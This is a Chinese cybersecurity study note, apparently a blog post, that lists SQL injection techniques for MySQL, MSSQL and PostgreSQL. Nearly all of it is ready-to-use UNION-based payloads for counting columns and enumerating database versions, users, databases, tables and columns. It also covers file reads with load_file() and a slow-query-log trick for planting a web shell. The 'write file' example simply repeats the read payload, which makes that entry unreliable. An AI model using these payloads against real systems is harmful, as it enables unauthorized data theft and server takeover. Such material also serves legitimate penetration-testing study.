网络安全之攻防笔记--通用漏洞SQL注入之MySQL&mssql&postgresql

  • 通用漏洞SQL注入之mysql&h&mssql&postgresql

    • mysql数据库
      • root高权限读写注入

        • 读取文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 写入文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 路径获取
          • phpinfo,报错,字典等
        • 无法写入

          • secure_file_priv 突破 注入中需要支持 SQL 执行环境,没有就需要借助 phpmyadmin 或能够直接连上对方数据库进行绕过
          • set global slow_query_log=1
          • set global slow_query_log_file='shell 路径';
          • select '' or SLEEP(1);
    • mssql数据库
      • 高权限读写注入

        • 可以执行系统命令、读写文件操作
        • 测列数

          • ORDER BY 4
          • AND 1=2 UNION SELECT NULL,NULL,NULL,NULL
        • 测显位
          • AND 1=2 UNION SELECT NULL,'NULL',NULL,NULL
        • 获取信息

          • AND 1=2 UNION SELECT NULL,@@VERSION,NULL,NULL
          • AND 1=2 UNION SELECT NULL,SUSER_NAME(),NULL,NULL
          • AND 1=2 UNION SELECT NULL,DB_NAME(),NULL,NULL
        • 获取数据库名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM master..sysdatabases
        • 获取表名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM sysobjects WHERE xtype='U'
        • 获取数据
          • AND 1=2 UNION SELECT NULL,column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'
    • postgresql数据库
      • 高权限读写注入

        • 测列数

          • order by 4
          • and 1=2 union select null,null,null,null
        • 测显位:第2,3

          • and 1=2 union select 'null',null,null,null 错误
          • and 1=2 union select null,'null',null,null 正常
          • and 1=2 union select null,null,'null',null 正常
          • and 1=2 union select null,null,null,'null' 错误
        • 获取信息

          • and 1=2 UNION SELECT null,version(),null,null
          • and 1=2 UNION SELECT null,current_user,null,null
          • and 1=2 union select null,current_database(),null,null
        • 获取数据库名:
          • and 1=2 union select null,string_agg(datname,','),null,null from pg_database
        • 获取表名

          • 1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
          • 2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables
        • 获取数据
          • and 1=2 union select
    • 另外

      • access无高权限注入点--只能猜解,还是暴力猜解
      • MySQL,postgresql,mssql高权限注入点-可升级读写执行
相关推荐
啥都不懂的小小白2 小时前
密码学入门:从古典加密到现代网络安全
安全·web安全·密码学
蒙奇D索大3 小时前
【数据结构】考研数据结构核心考点:二叉排序树(BST)全方位详解与代码实现
数据结构·笔记·学习·考研·算法·改行学it
玲娜贝儿--努力学习买大鸡腿版3 小时前
推荐算法学习笔记(十九)阿里SIM 模型
笔记·学习·推荐算法
XYiFfang4 小时前
【MYSQL】SQL学习指南:从常见错误到高级函数与正则表达式
sql·mysql·正则表达式·regexp_like·group_concat
我命由我123455 小时前
Photoshop - Photoshop 工具栏(10)透视裁剪工具
经验分享·笔记·学习·ui·职场和发展·职场发展·photoshop
JJJJ_iii5 小时前
【深度学习03】神经网络基本骨架、卷积、池化、非线性激活、线性层、搭建网络
网络·人工智能·pytorch·笔记·python·深度学习·神经网络
玉石观沧海5 小时前
高压变频器故障代码解析F67 F68
运维·经验分享·笔记·分布式·深度学习
十碗饭吃不饱6 小时前
sql报错:java.sql.SQLSyntaxErrorException: Unknown column ‘as0‘ in ‘where clause‘
java·数据库·sql
初级炼丹师(爱说实话版)7 小时前
MySql速成笔记5(多表关系)
笔记
呆呆小金人7 小时前
SQL入门: HAVING用法全解析
大数据·数据库·数据仓库·sql·数据库开发·etl·etl工程师